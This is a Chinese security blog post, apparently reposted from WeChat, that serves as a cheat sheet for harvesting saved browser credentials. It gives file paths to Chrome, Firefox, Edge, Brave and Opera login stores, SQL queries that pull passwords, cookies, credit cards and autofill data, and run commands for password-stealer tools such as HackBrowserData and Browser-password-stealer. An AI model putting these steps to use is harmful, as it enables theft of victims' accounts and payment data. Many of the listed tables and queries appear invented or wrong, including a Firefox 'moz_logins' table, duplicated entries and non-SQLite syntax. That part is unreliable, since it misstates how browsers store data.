配置文件
Google Chrome:
Windows:
C:Users<USER>AppDataLocalGoogleChromeUser DataDefaultLogin DataLinux:
~/.config/google-chrome/Default/Login DatamacOS:
~/Library/Application Support/Google/Chrome/Default/Login DataMozilla Firefox:
Windows:
C:Users<USER>AppDataRoamingMozillaFirefoxProfiles<ProfileName>logins.jsonLinux:
~/.mozilla/firefox/<ProfileName>/logins.jsonmacOS:
~/Library/Application Support/Firefox/Profiles/<ProfileName>/logins.jsonBrave:
Windows:
C:Users<USER>AppDataLocalBraveSoftwareBrave-BrowserUser DataDefaultLogin DataLinux:
~/.config/BraveSoftware/Brave-Browser/Default/Login DatamacOS:
~/Library/Application Support/BraveSoftware/Brave-Browser/Default/Login DataOpera:
Windows:
C:Users<USER>AppDataRoamingOpera SoftwareOpera StableLogin DataLinux:
~/.config/opera/Login DatamacOS:
~/Library/Application Support/com.operasoftware.Opera/Login DataMicrosoft Edge (Chromium):
C:Users<USER>AppDataLocalMicrosoftEdgeUser DataDefaultLogin Data主要的表和列
Chrome
| Table Name | Column Name(s) | Description |
| logins |
action_url username_value password_value |
保存的网站用户名和密码 |
| autofill |
name value |
自动填充表单和字段的数据 |
| cookies |
host_key name value |
浏览器存储的cookie |
| bookmarks |
url title |
书签URL和标题 |
| history |
url title |
浏览历史记录的URL和标题 |
| downloads |
url target_path |
下载文件记录 |
| credit_cards |
name_on_car card_number |
保存的信用卡信息 |
| web_apps |
url name |
有关网络应用程序的信息 |
| extensions |
name permissions |
安装的浏览器拓展插件 |
| top_sites |
url title |
最常访问的网站 |
| search_engines |
keyword url |
关键词和URL |
| media_engagement |
last_engagement_time_usec |
媒体数据 |
| media_history |
playback_start_time_usec |
媒体播放历史 |
| media_session | media_unique_id | 媒体播放sessions |
| visits |
url visit_time |
访问的url和相应的时间 |
| downloads_url_chains | url_chain | 下载文件的URL链接 |
| keywords | keyword | 关键词 |
| keyword_search_terms |
url lower_term |
指定关键词搜索 |
| usb_devices | guid | 已连接的USB设备信息 |
| forms | name | 自动填写表单数据 |
| origins | origin | 各种浏览器数据的来源 |
| network_action_predictor_service |
url suggested_prio |
网络行为的数据 |
| protocol_handler |
protocol url |
自定义配置协议 |
| startup_urls | url | 浏览器启动时打开的URL |
| appcache |
cache_id size |
应用程序缓存数据 |
| local_storage |
origin key |
本地存储的数据 |
| extension_cookies |
host_key name value |
扩展插件设置的cookie |
| managed_user_passwords |
url username password |
管理用户密码 |
| translate_ranking | origin | 网站翻译相关数据 |
| android_favicons | page_url | android版图标 |
Firefox
| Table Name | Column Name(s) | Description |
| moz_logins |
formSubmitURL hostname encryptedUsername encryptedPassword |
保存的网站用户名和密码 |
| moz_autofill |
name value |
自动填充表单和字段的数据 |
| moz_cookies |
host name value |
存储的浏览器cookie |
| moz_bookmarks |
url title |
书签URL和标题 |
| moz_historyvisits |
from_visit place_id visit_date |
URL访问历史记录 |
| moz_downloads |
source target |
下载文件记录 |
| moz_creditcards |
nameOnCard cardNumber |
保存信用卡信息 |
| moz_places |
url title |
URL和标题 |
| moz_extensions |
name permissions |
安装的浏览器拓展插件 |
| moz_keywords | keyword | 关键词搜索 |
| moz_searchlog | query | 搜索栏搜索 |
| moz_meta |
key value |
关联数据 |
| moz_origins | origin | 浏览器数据来源 |
| moz_annotations |
type name |
书签注释 |
| moz_inputhistory | input | 表单输入历史记录 |
| moz_favicons | url | URL关联favicons |
| moz_inputhistory |
place_id fieldname |
表单输入历史记录 |
| moz_pages_w_icons | page_url | URL关联图标 |
| moz_places |
url title visit_count |
访问带有附加数据的URL |
| moz_annos |
anno_attribute_id content |
书签或页面上的注释 |
| moz_meta |
key value |
与各种数据相关联的元数据 |
| moz_annos |
place_id anno_attribute_id |
书签或页面上的注释 |
| moz_keywords |
place_id keyword_id |
与地点相关的关键词 |
| moz_origins | origin | 浏览器数据的来源 |
| moz_icons |
url favicon_id |
URL关联的Favicons |
| moz_webapps |
origin app_id |
已安装的web应用程序 |
| moz_hosts | host | 访问URL的HOST |
| moz_cookies |
baseDomain name value |
存储cookie |
| moz_syncedtabs |
url title |
跨设备同步的选项卡 |
| moz_sync |
id name |
用户账户的同步数据 |
| moz_preferences |
hostname value |
用户首选项 |
| moz_downloads |
target state |
下载文件记录 |
Edge
| Table Name | Column Name(s) | Description |
| logins |
action_url username_value password_value |
保存网站用户名和密码 |
| autofill |
name value |
自动填写表单和字段的数据 |
| cookies |
host_key name value |
浏览器存储的cookie |
| bookmarks |
url title |
书签URL和标题 |
| history |
url title |
浏览历史网址和标题 |
| downloads |
url target_path |
下载文件记录 |
| credit_cards |
name_on_card card_number |
保存信用卡信息 |
| extensions |
name permissions |
安装的浏览器拓展插件 |
| top_sites |
url title |
最常访问的网站 |
| search_engines |
keyword url |
关键词和URL |
| media_engagement |
origin last_engagement_time_usec |
媒体数据 |
| media_history |
origin playback_start_time_usec |
媒体播放历史 |
| media_session | media_unique_id | 媒体播放sessions |
| visits |
url visit_time |
访问的url和相应的时间 |
| downloads_url_chains | url_chain | 下载文件的URL链接 |
| keywords | keyword | 关键词 |
| keyword_search_terms |
url lower_term |
指定关键词搜索 |
| usb_devices | guid | 已连接的USB设备信息 |
| forms | name | 自动填写表单数据 |
| origins | origin | 各种浏览器数据的来源 |
| network_action_predictor_service |
url suggested_prio |
网络行为的数据 |
| protocol_handler |
protocol url |
自定义配置协议 |
| startup_urls | url | 浏览器启动时打开的URL |
| appcache |
cache_id size |
应用程序缓存数据 |
| local_storage |
origin key |
本地存储的数据 |
| extension_cookies |
host_key name value |
扩展插件设置的cookie |
| managed_user_passwords |
url username password |
管理用户密码 |
| translate_ranking | origin | 网站翻译相关数据 |
| android_favicons | page_url | android版图标 |
SQL查询语句
提取有效期的cookie
SELECT host_key, name, value, expires_utc FROM cookies;提取自动填充字段
SELECT name, value FROM autofill WHERE field_type = 'field';提取带有标签的URL书签
SELECT url, title, GROUP_CONCAT(tags) AS bookmark_tags FROM bookmarks GROUP BY url, title;提取下载文件源地址和时间
SELECT url, target_path, start_time, end_time FROM downloads;提取表单输入数据和数据源
SELECT origin, field_name, value FROM forms;提取用户输入表单历史字段
SELECT form_field, user_input FROM input_history;提取访问的URL与时间戳
SELECT url, visit_time, referring_visit_id FROM visits;提取用户注释的书签与日期
SELECT url, annotation, created, modified FROM annotations;提取Web应用程序和安装日期
SELECT origin, app_id, last_update_time FROM web_apps;提取访问URL的HOST
SELECT url, host FROM visits JOIN hosts ON visits.url = hosts.url;提取媒体时间和数量
SELECT origin, SUM(count) AS total_engagement_count, MAX(last_engagement_time_usec) AS last_engagement_time FROM media_engagement GROUP BY origin;提取用户搜索与时间戳
SELECT keyword, url, search_time FROM search_engines;提取表单提交的密码
SELECT formSubmitURL, encryptedUsername, encryptedPassword FROM moz_logins WHERE formSubmitURL IS NOT NULL;提取信用卡过期年月
SELECT name_on_card, card_number, expiration_month, expiration_year FROM credit_cards;提取同步数据与设备信息
SELECT id, name, device_type, last_modified FROM sync;提取具有关联数据源
SELECT origin, origin_attributes FROM origins;提取扩展插件名称和安装日期
SELECT name, permissions, install_date FROM extensions;提取下载的文件大小
SELECT url, target_path, bytes_total FROM downloads;提取下载文件的URL链接
SELECT url_chain FROM downloads_url_chains;提取持续播放媒体会话
SELECT media_unique_id, playback_start_time_usec, duration_usec FROM media_session;提取USB设备信息
SELECT guid, manufacturer, product FROM usb_devices;提取网络信息
SELECT url, suggested_prio FROM network_action_predictor_service;提取带有关联url的协议处理程序
SELECT protocol, url FROM protocol_handler;提取浏览器启动创建的URL
SELECT url, created FROM startup_urls;提取高访问URL信息
SELECT url, title, visit_count FROM visits WHERE visit_count > 100;提取最频繁的搜索关键词
SELECT keyword, COUNT(*) AS query_count FROM search_engines GROUP BY keyword ORDER BY query_count DESC LIMIT 10;提取尝试登录的失败信息
SELECT action_url, username_value, password_value, times_used, times_failed FROM logins WHERE times_failed > 0;按标签提取书签URL
SELECT url, title, GROUP_CONCAT(tags) AS bookmark_tags FROM bookmarks GROUP BY url, title HAVING bookmark_tags LIKE '%important%';提取用户关键字输入历史
SELECT form_field, user_input, input_timestamp FROM input_history WHERE user_input LIKE '%password%' OR user_input LIKE '%credit card%';提取同步标签与最后更新时间戳
SELECT url, title, last_updated FROM synced_tabs;提取指定域名的cookie
SELECT host_key, name, value FROM cookies WHERE host_key IN ('example.com', 'test.com');提取表单输入数据
SELECT origin, field_name, value FROM forms WHERE origin LIKE '%phishing%';从url提取下载的文件
SELECT url, target_path, start_time, end_time FROM downloads WHERE url LIKE '%malware%';提取带有关键字的用户注释
SELECT url, annotation, created, modified FROM annotations WHERE annotation LIKE '%hack%' OR annotation LIKE '%exploit%';提取高参与时间访问的url
SELECT url, visit_time FROM visits WHERE visit_time >= NOW() - INTERVAL 1 DAY ORDER BY visit_time DESC LIMIT 10;提取用户输入历史的频繁关键字
SELECT form_field, user_input, COUNT(*) AS input_count FROM input_history WHERE user_input IN ('password', 'credit card') GROUP BY form_field, user_input ORDER BY input_count DESC LIMIT 10;提取最常用的扩展
SELECT name, COUNT(*) AS install_count FROM extensions GROUP BY name ORDER BY install_count DESC LIMIT 10;提取在过去一个月没有访问的URL
SELECT url FROM history WHERE last_visit_time < NOW() - INTERVAL 30 DAY;提取媒体播放会话
SELECT media_unique_id, playback_start_time_usec, duration_usec FROM media_session WHERE duration_usec > 3600000; -- Sessions longer than 1 hour提取URL与频繁的关键字搜索
SELECT url, title, COUNT(*) AS search_count FROM history WHERE title LIKE '%search%' GROUP BY url, title ORDER BY search_count DESC LIMIT 10;提取频繁的表单输入
SELECT origin, form_field, COUNT(*) AS input_count FROM forms GROUP BY origin, form_field ORDER BY input_count DESC LIMIT 10;提取USB设备连接
SELECT guid, manufacturer, product FROM usb_devices WHERE manufacturer LIKE '%unknown%' ORDER BY connection_timestamp DESC LIMIT 5;提取下载的URL链接
SELECT url_chain FROM downloads_url_chains WHERE url_chain LIKE '%malware%';提取同步数据的设备
SELECT id, name, device_type, last_modified FROM sync WHERE device_type = 'unknown';提取频繁提交表单的URL
SELECT action_url, COUNT(*) AS submission_count FROM logins GROUP BY action_url ORDER BY submission_count DESC LIMIT 10;提取协议处理程序
SELECT protocol, url FROM protocol_handler WHERE protocol LIKE '%exploit%' LIMIT 5;提取统计Cookie最多的url
SELECT host_key, COUNT(*) AS cookie_count FROM cookies GROUP BY host_key ORDER BY cookie_count DESC LIMIT 10;提取具有元数据的源
SELECT origin, origin_attributes FROM origins WHERE origin_attributes LIKE '%suspicious%';提取扩展插件权限
SELECT permissions, COUNT(*) AS extension_count FROM extensions GROUP BY permissions ORDER BY extension_count DESC LIMIT 10;提取自动填充数据
SELECT name, value FROM autofill WHERE value LIKE '%password%' OR value LIKE '%credit card%';自动化工具
HackBrowserData
https://github.com/moonD4rk/HackBrowserData
.hack-browser-data.exe -b all -f json --dir results -zip或.hack-browser-data.exe -b chrome -p "C:UsersUserAppDataLocalMicrosoftEdgeUser DataDefault"
Browser-password-stealer
https://github.com/henry-richard7/Browser-password-stealer
pip install -r requirements.txtpython chromium_based_browsers.py
BrowserPass
https://github.com/jabiel/BrowserPass
BrowserPass.exeWebBrowserPassView
https://www.nirsoft.net/utils/web_browser_password.html
WebBrowserPassView.exeInfornito
https://github.com/globecyber/Infornito
python infornito.py history --profile 2 --export csv --to ~/Desktop/export或python infornito.py downloads --profile 2或python infornito.py history --profile 2 --filter domain=target.com --filter filetype=pdf --filter protocols=https --filter port=4880
Hindsight
https://github.com/obsidianforensics/hindsight
pip install pyhindsightcurl -sSL https://raw.githubusercontent.com/obsidianforensics/hindsight/master/install-js.sh | sh或Windowshindsight_gui.exehttp://localhost:8080/
BrowserFreak
https://github.com/OsandaMalith/BrowserFreak
BrowserFreak.batBrowserStealer
https://github.com/SaulBerrenson/BrowserStealer
BrowserCollector.exe原文始发于微信公众号(Matrix SEC):获取浏览器凭据的方法Tips
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论